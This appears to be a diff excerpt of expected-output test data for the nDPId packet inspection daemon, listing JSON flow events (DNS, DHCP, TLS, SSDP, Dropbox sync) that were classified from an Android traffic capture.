01076{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454784313,"flow_last_seen":1582454866536,"flow_idle_time":180000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3584,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}}
00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454869517,"flow_last_seen":1582454872012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5382,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454869517,"flow_last_seen":1582454872012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5382,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1582454868348,"flow_last_seen":1582454870097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5016,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1582454868348,"flow_last_seen":1582454870097,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5016,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1582454867151,"flow_last_seen":1582454867312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":715,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}}
00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1582454867151,"flow_last_seen":1582454867312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":715,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}}
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866407,"flow_last_seen":1582454866538,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454792980,"flow_last_seen":1582454853081,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1530,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
@@ -337,44 +337,44 @@
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866448,"flow_last_seen":1582454868606,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1582454867688,"flow_last_seen":1582454868211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5497,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871042,"flow_last_seen":1582454871531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6624,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1582454871069,"flow_last_seen":1582454872035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5325,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871075,"flow_last_seen":1582454871428,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
